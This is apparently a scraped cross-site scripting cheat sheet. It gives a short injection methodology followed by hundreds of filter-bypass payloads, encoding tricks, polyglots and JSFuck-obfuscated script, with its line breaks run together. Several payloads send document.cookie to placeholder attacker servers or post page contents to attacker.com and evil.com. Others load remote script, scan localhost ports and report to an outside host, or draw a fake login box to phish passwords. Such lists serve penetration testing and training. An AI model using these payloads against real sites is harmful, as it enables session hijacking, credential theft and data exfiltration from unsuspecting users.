XSS (Cross Site Scripting)
1- Check if the server response includes content sent by you 2- Find where is located the input controlled by you (inside a tag, outside, inside the URL --Form with PHP_SELF--, inside javascript code?) 3- Check how can you add javascript code 3.1- On a event inside a tag (onerror, onfocus, href...) 3.2- Closing a tag and opening a new one ( "><img …") 3.3- Open a new tag("<script>...") 3.4- Altering the Javascript code execution 4- Check which characters are allowed (can you close and/or open a tag? can you create a new event handler? can you inject javascript code?) 5- Create a PoC
In the case that you cannot exploit a injection vulnerability as a XSS check Dangling Markup - HTML scriptless injection.
<img src=x onerror=alert(document.cookie);><body onload=alert('test1')><button onfocus=alert(1) autofocus><iframe src="javascript:alert(0)" height="0" width="0"><iframe src="data:text/html;base64,PHNjcmlwdD5wYXJlbnQuYWxlcnQoZG9jdW1lbnQuZG9tYWluKTs8L3NjcmlwdD4="><svg onload=alert('XSS')><svg onload=alert(1)><Video><source onerror="alert('XSS')"><audio><source onerror="alert('XSS')"><object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4="></object><input autofocus onfocus=alert(1)><select autofocus onfocus=alert(1)><textarea autofocus onfocus=alert(1)><keygen autofocus onfocus=alert(1)><video src=_ onloadstart="alert(1)"><details/open/ontoggle="alert`1`"><audio src onloadstart=alert(1)><marquee onstart=alert(1)><META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"><meta/content="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgxMzM3KTwvc2NyaXB0Pg=="http-equiv=refresh><META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');"><body ontouchstart=alert(1)> // Triggers when a finger touch the screen<body ontouchend=alert(1)> // Triggers when a finger is removed from touch screen<body ontouchmove=alert(1)> // When a finger is dragged across the screen
More
Upload as an image a file like the following one (from http://ghostlulz.com/xss-svg/):
Content-Type: multipart/form-data; boundary=---------------------------232181429808Content-Length: 574-----------------------------232181429808Content-Disposition: form-data; name="img"; filename="img.svg"Content-Type: image/svg+xml<?xml version="1.0" standalone="no"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"><rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" /><script type="text/javascript">alert("Ghostlulz XSS");</script></svg>-----------------------------232181429808--
<b onmouseover=alert('Wufff!')>click me!</b><isindex x="javascript:" onmouseover="alert(XSS)">click me!<input type="text" value="" Onblur=alert(666) size="30"><meter value=2 min=0 max=10 onmouseover=alert(1)>2 out of 10</meter><img ismap= itemtype='yyy style=width:100%;height:100%;position:fixed;left:\ 0px;top:0px; onmouseover=alert(/XSS/)//'><img ismap=itemtype=yyy style=width:100%;height:100%;position:fixed;left:0px;top\ :0px; onmouseover=alert(/XSS/)//><a href="#" onclick="alert(1)"> //If the user clicks in the next <a> the alert will be executed
https://github.com/RealLinkers/cookieless
<img src='http://attacker.com/log.php?HTML= //Get all code until next '<meta http-equiv="refresh" content='0; url=http://evil.com/log.php?text= //Get all code until next '<textarea autofocus onfocus=alert(1) //Get all code
<iframe/src="data:text/html,<svg onload=alert(1)>"><input type=image src onerror="prompt(1)"><svg onload=alert(1)//<img src="/" =_=" title="onerror='prompt(1)'"><img src='1' onerror='alert(0)' <<script x> alert(1) </script 1=2<script x>alert('XSS')<script y><svg/onload=location=`javas`+`cript:ale`+`rt%2`+`81%2`+`9`;//<img src=1 alt=al lang=ert onerror=top[alt+lang](0)><script>$=1,alert($)</script><script ~~~>confirm(1)</script ~~~><script>$=1,\u0061lert($)</script><</script/script><script>eval('\\u'+'0061'+'lert(1)')//</script><</script/script><script ~~~>\u0061lert(1)</script ~~~></style></scRipt><scRipt>alert(1)</scRipt><img src=x:prompt(eval(alt)) onerror=eval(src) alt=String.fromCharCode(88,83,83)><svg><x><script>alert('1')</x><iframe src=""/srcdoc='<svg onload=alert(1)>'><img/id="alert('XSS')\"/alt=\"/\"src=\"/\"onerror=eval(id)><img src=1 onerror="s=document.createElement('script');s.src='http://xss.rocks/xss.js';document.body.appendChild(s);"
You can also try to send all possible tags and all possible events and using: https://gitlab.com/jlajara/xss-tag_event-analyzer find if there is any combination of tags and events suitable to exploit the XSS. More info in: https://jlajara.gitlab.io/posts/2020/01/25/XSS_tag_event_analyzer.html.
script --> ScrIpT<ScrIpT>alert(1)</ScrIpT>space == / == /*%00/ == /%00*/Strings --> "XSS" == /XSS/.source<input/autofocus/*%00//%00*/onfocus=alert(1)>Not close ending with " <" or " //": <iframe SRC="javascript:alert('XSS');" <Extra open: <<script>alert("XSS");//<</script>Subs parenthesis for `` in alert and setTimeout: <details open ontoggle=alert`1`> setTimeout`alert\u0028document.domain\u0029`;Add unnecessary fields<<TexTArEa/*%00//%00*/a="not"/*%00///AutOFocUs////onFoCUS=alert`1` //Input as image: <input type=image src onerror="prompt(1)">
"><svg/onload=confirm(1)>"@x.y
Due to RoR mass assignment quotes are inserted in the HTML and then the quote restriction is bypassed and additoinal fields (onfocus) can be added inside the tag. Form example (from this report), if you send the payload:
contact[email] onfocus=javascript:alert('xss') autofocus a=a&form_type[a]aaa
The pair "Key","Value" will be echoed back like this:
{" onfocus=javascript:alert('xss') autofocus a"=>"a"}
Then, the onfocus attribute will be inserted:
An a XSS occurs.
From here: You can execute an XSS payload inside a hidden attribute, provided you can persuade the victim into pressing the key combination. On Firefox Windows/Linux the key combination is ALT+SHIFT+X and on OS X it is CTRL+ALT+X. You can specify a different key combination using a different key in the access key attribute. Here is the vector:
<input type="hidden" accesskey="X" onclick="alert(1)">
The XSS payload will be something like this: " accesskey="x" onclick="alert(1)" x='
You might have a link element with a rel attribute on canonical, if you inject the accesskey attribute with an onclick event then you have XSS. <link rel="canonical" accesskey="X" onclick="alert(1)" />
Taken from the blog of Jorge Lajara.
<svg/onload=alert``><script src=//aa.es><script src=//℡㏛.pw>
The last one is using 2 unicode characters which expands to 5: telsr
More of these characters can be found here. To check in which characters are decomposed check here.
Substitute the space for: %0A (\n) %09 (\t) %0D (\r)
<iframe src="javascri%0Apt:alert(0)"><iframe src="javascri%09pt:alert(0)"><iframe src="javascri%0Dpt:alert(0)"><iframe src="javascript://%0Aalert(1)"><iframe src="javascript://anything%0D%0A%0D%0Awindow.alert(1)"><img src onerror%0A=alert(1) /><img src onerror%09=alert(1) /><img src onerror%0D=alert(1) />
https://github.com/dreadlocked/ctf-writeups/blob/master/nn8ed/README.md Valid as String inside a script or name of a function inside a HTML tag (not parameter or parenthesis) \u0061 --> "a" \u{61} --> "a"
alert(1)<script>\u0061\u006C\u0065\u0072\u0074\u0028\u0031\u0029</script> NOT WORK<script>eval('\u0061\u006C\u0065\u0072\u0074\u0028\u0031\u0029')</script> WORK<img src onerror=\u0061\u006C\u0065\u0072\u0074\u0028\u0031\u0029 /> NOT WORK<img src onerror=\u0061\u006C\u0065\u0072\u0074(1) /> WORK<svg onload="javascript:\u0061\u006C\u0065\u0072\u0074\u0028\u0031\u0029" // NOT WORK<svg onload=\u0061\u006C\u0065\u0072\u0074(1) // WORK<iframe src="javascript:\u0061\u006C\u0065\u0072\u0074\u0028\u0031\u0029"></iframe> NOT WORK<iframe src="javascript:\u0061\u006C\u0065\u0072\u0074(1)"></iframe> WORK
Can do the same using this syntax: \u{61}
https://github.com/dreadlocked/ctf-writeups/blob/master/nn8ed/README.md https://mathiasbynens.be/notes/javascript-unicode https://mathiasbynens.be/notes/javascript-encoding Find Unicode surrogate pairs of 2 chars (The last 2 bytes of the H == 1ºchar and last 2bytes of L ==2ºchar)
def unicode(findHex):for i in range(0,0xFFFFF):H = hex(int(((i - 0x10000) / 0x400) + 0xD800))h = chr(int(H[-2:],16))L = hex(int(((i - 0x10000) % 0x400 + 0xDC00)))l = chr(int(L[-2:],16))if(h == findHex[0]) and (l == findHex[1]):print(H.replace("0x","\\u")+L.replace("0x","\\u"))
%61 --> "a"
alert(1)<script>%61%6c%65%72%74%28%31%29</script> NOT WORKS<script>eval("%61%6c%65%72%74%28%31%29")</script> NOT WORKS<img src onerror="javascript:%61%6c%65%72%74%28%31%29" /> NOT WORKS<svg onload="javascript:%61%6c%65%72%74%28%31%29" // NOT WORKS<iframe src=javascript:%61%6c%65%72%74%28%31%29></iframe> WORKS
Valid inside HTML tags (not inside <script>)
= --> "a" = --> "a"
alert(1)<script>alert(1)</script> NOT WORKS<script>eval("alert(1)")</script> NOT WORKS<img src onerror=alert(1) /> WORKS<img src onerror="alert(1)" /> WORKS<svg onload=alert(1) // WORKS<iframe src="javascript:alert(1)"></iframe> WORKS( javascript:alert(1) )
&# Decimal with or without zeros
a --> "a" a --> "a"
alert(1)<script>alert(1)</script> NOT WORKS<script>eval('alert(1)')</script> NOT WORKS<img src onerror=alert(1) /> WORKS<img src onerror=alert(1) /> WORKS<svg onload=alert(1) // WORKS<iframe src="javascript:alert(1)"></iframe> WORKS( javascript:alert(1) )
Entities
( --> (
document.cookie<script>alert(document.cookie)</script> NOT WORKS<script>eval(alert(document.cookie))</script> NOT WORKS<img src onerror=alert(document.cookie) /> WORKS<svg onload=javascript:alert(document.cookie) // WORKS<iframe src=javascript:alert(document.cookie)> WORKS
Valid as String inside a script \x61--> "a"
alert(1)<script>\x61\x6c\x65\x72\x74\x28\x31\x29</script> NOT WORKS<script>eval("\x61\x6c\x65\x72\x74\x28\x31\x29")</script> WORKS<img src onerror=\x61\x6c\x65\x72\x74\x28\x31\x29 /> NOT WORKS<svg onload=javascript:'\x61\x6c\x65\x72\x74\x28\x31\x29' // NOT WORKS<iframe src=javascript:'\x3c\x73\x76\x67\x20\x6f\x6e\x6c\x6f\x61\x64\x3d\x61\x6c\x65\x72\x74\x28\x31\x29\x3e' /> WORKS //<svg onload=alert(1)>
Valid as String inside a script \141 --> "a"
alert(1)<script>\141\154\145\162\164\50\61\51</script> NOT WORKS<script>eval("\141\154\145\162\164\50\61\51")</script> WORKS<img src onerror=\141\154\145\162\164\50\61\51 /> NOT WORKS<svg onload=javascript:'\141\154\145\162\164\50\61\51' // NOT WORKS<iframe src=javascript:'\74\163\166\147\40\157\156\154\157\141\144\75\141\154\145\162\164\50\61\51\76' /> WORKS //<svg onload=alert(1)>
<object data="data:text/html,<script>alert(1)</script>"></object><object data="data:text/html;charset=iso-8859-7,%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%31%29%3c%2f%73%63%72%69%70%74%3e"></object><object data="data:text/html;charset=UTF-8,<script>alert(1)</script>"></object><object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4="></object><object data="data:text/html;charset=thing;base64,PHNjcmlwdD5hbGVydCgndGVzdDMnKTwvc2NyaXB0Pg"></object>
<img src=x onerror=this.src="http://<YOUR_SERVER_IP>/?c="+document.cookie><img src=x onerror="location.href='http://<YOUR_SERVER_IP>/?c='+ document.cookie"><script>new Image().src="http://<IP>/?c="+encodeURI(document.cookie);</script><script>location.href = 'http://<YOUR_SERVER_IP>/Stealer.php?cookie='+document.cookie</script><script>location = 'http://<YOUR_SERVER_IP>/Stealer.php?cookie='+document.cookie</script><script>document.location = 'http://<YOUR_SERVER_IP>/Stealer.php?cookie='+document.cookie</script><script>document.location.href = 'http://<YOUR_SERVER_IP>/Stealer.php?cookie='+document.cookie</script><script>document.write('<img src="http://<YOUR_SERVER_IP>?c='+document.cookie+'" />')</script><script>window.location.assign('http://<YOUR_SERVER_IP>/Stealer.php?cookie='+document.cookie)</script><script>window['location']['assign']('http://<YOUR_SERVER_IP>/Stealer.php?cookie='+document.cookie)</script><script>window['location']['href']('http://<YOUR_SERVER_IP>/Stealer.php?cookie='+document.cookie)</script><script>document.location=["http://<YOUR_SERVER_IP>?c",document.cookie].join()</script><script>var i=new Image();i.src="http://<YOUR_SERVER_IP>/?c="+document.cookie</script><script>window.location="https://<SERVER_IP>/?c=".concat(document.cookie)</script><script>var xhttp=new XMLHttpRequest();xhttp.open("GET", "http://<SERVER_IP>/?c="%2Bdocument.cookie, true);xhttp.send();</script><script>eval(atob('ZG9jdW1lbnQud3JpdGUoIjxpbWcgc3JjPSdodHRwczovLzxTRVJWRVJfSVA+P2M9IisgZG9jdW1lbnQuY29va2llICsiJyAvPiIp'));</script>
const checkPort = (port) => { fetch(http://localhost:${port}, { mode: "no-cors" }).then(() => { let img = document.createElement("img"); img.src = http://attacker.com/ping?port=${port}; }); } for(let i=0; i<1000; i++) { checkPort(i); }
<style>::placeholder { color:white; }</style><script>document.write("<div style='position:absolute;top:100px;left:250px;width:400px;background-color:white;height:230px;padding:15px;border-radius:10px;color:black'><form action='https://example.com/'><p>Your sesion has timed out, please login again:</p><input style='width:100%;' type='text' placeholder='Username' /><input style='width: 100%' type='password' placeholder='Password'/><input type='submit' value='Login'></form><p><i>This login box is presented using XSS as a proof-of-concept</i></p></div>")</script>
alert(String.fromCharCode(88,83,83))alert`document.cookie`alert(document['cookie'])with(document)alert(cookie)eval('ale'+'rt(1)')(alert)(1)(alert(1))in"."a=alert,a(1)[1].find(alert)window['alert'](0)parent['alert'](1)self['alert'](2)top['alert'](3)this['alert'](4)frames['alert'](5)content['alert'](6)[7].map(alert)[8].find(alert)[9].every(alert)[10].filter(alert)[11].findIndex(alert)[12].forEach(alert);top[/al/.source+/ert/.source](1)top[8680439..toString(30)](1)Function("ale"+"rt(1)")();new Function`al\ert\`6\``;setTimeout('ale'+'rt(2)');setInterval('ale'+'rt(10)');Set.constructor('ale'+'rt(13)')();Set.constructor`al\x65rt\x2814\x29```;$='e'; x='ev'+'al'; x=this[x]; y='al'+$+'rt(1)'; y=x(y); x(y)x='ev'+'al'; x=this[x]; y='ale'+'rt(1)'; x(x(y))this[[]+('eva')+(/x/,new Array)+'l'](/xxx.xxx.xxx.xxx.xx/+alert(1),new Array)
If a web page is creating a PDF using user controlled input, you can try to trick the bot that is creating the PDF into executing arbitrary JS code. So, if the PDF creator bot finds some kind of HTML tags, it is going to interpret them, and you can abuse this behaviour to cause a Server XSS. Find more information here.
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSS%20injection http://www.xss-payloads.com https://github.com/Pgaijin66/XSS-Payloads/blob/master/payload.txt https://github.com/materaj/xss-list https://github.com/ismailtasdelen/xss-payload-list https://gist.github.com/rvrsh3ll/09a8b933291f9f98e8ec
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e">><marquee><img src=x onerror=confirm(1)></marquee>" ></plaintext\></|\><plaintext/onmouseover=prompt(1) ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->" ></script><script>alert(1)</script>"><img/id="confirm( 1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http: //i.imgur.com/P8mL8.jpg">" onclick=alert(1)//<button ‘ onclick=alert(1)//> */ alert(1)//';alert(String.fromCharCode(88,83,83))//';alert(String. fromCharCode(88,83,83))//";alert(String.fromCharCode (88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83)) </SCRIPT>javascript://'/</title></style></textarea></script>--><p" onclick=alert()//>*/alert()/*javascript://--></script></title></style>"/</textarea>*/<alert()/*' onclick=alert()//>ajavascript://</title>"/</script></style></textarea/-->*/<alert()/*' onclick=alert()//>/javascript://</title></style></textarea>--></script><a"//' onclick=alert()//>*/alert()/*javascript://'//" --></textarea></style></script></title><b onclick= alert()//>*/alert()/*javascript://</title></textarea></style></script --><li '//" '*/alert()/*', onclick=alert()//javascript:alert()//--></script></textarea></style></title><a"//' onclick=alert()//>*/alert()/*--></script></title></style>"/</textarea><a' onclick=alert()//>*/alert()/*/</title/'/</style/</script/</textarea/--><p" onclick=alert()//>*/alert()/*javascript://--></title></style></textarea></script><svg "//' onclick=alert()///</title/'/</style/</script/--><p" onclick=alert()//>*/alert()/*-->'"/></sCript><svG x=">" onload=(co\u006efirm)``><svg%0Ao%00nload=%09((pro\u006dpt))()//javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*<svg/*/onload=alert()//>javascript:"/*'/*`/*\" /*</title></style></textarea></noscript></noembed></template></script/--><svg/onload=/*<html/*/onmouseover=alert()//>javascript:"/*\"/*`/*' /*</template></textarea></noembed></noscript></title></style></script>--><svg onload=/*<html/*/onmouseover=alert()//>javascript:`//"//\"//</title></textarea></style></noscript></noembed></script></template><svg/onload='/*--><html */ onmouseover=alert()//'>`%0ajavascript:`/*\"/*--><svg onload='/*</template></noembed></noscript></style></title></textarea></script><html onmouseover="/**/ alert(test)//'">`
A HTML comment can be closed using --> or --!>
https://github.com/aemkei/katakana.js https://ooze.ninja/javascript/poisonjs https://javascriptobfuscator.herokuapp.com/ https://skalman.github.io/UglifyJS-online/ http://www.jsfuck.com/ More sofisticated JSFuck: https://medium.com/@Master_SEC/bypass-uppercase-filters-like-a-pro-xss-advanced-methods-daf7a82673ce
<script>([,ウ,,,,ア]=[]+{},[ネ,ホ,ヌ,セ,,ミ,ハ,ヘ,,,ナ]=[!!ウ]+!ウ+ウ.ウ)[ツ=ア+ウ+ナ+ヘ+ネ+ホ+ヌ+ア+ネ+ウ+ホ][ツ](ミ+ハ+セ+ホ+ネ+'(-~ウ)')()</script>
<script>$=~[];$={___:++$,$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$:({}+"")[$],$_$:($[$]+"")[$],_$:++$,$_:(!""+"")[$],$__:++$,$_$:++$,$__:({}+"")[$],$_:++$,$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+"")[$.$_$]+($._$=$.$_[$.__$])+($.$=($.$+"")[$.__$])+((!$)+"")[$._$]+($.__=$.$_[$.$_])+($.$=(!""+"")[$.__$])+($._=(!""+"")[$._$_])+$.$_[$.$_$]+$.__+$._$+$.$;$.$=$.$+(!""+"")[$._$]+$.__+$._+$.$+$.$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$+"\""+$.$_$_+(![]+"")[$._$_]+$.$_+"\\"+$.__$+$.$_+$._$_+$.__+"("+$.___+")"+"\"")())();</script>
<script>(+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[+!+[]]+[!+[]+!+[]+!+[]+!+[]]]+[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+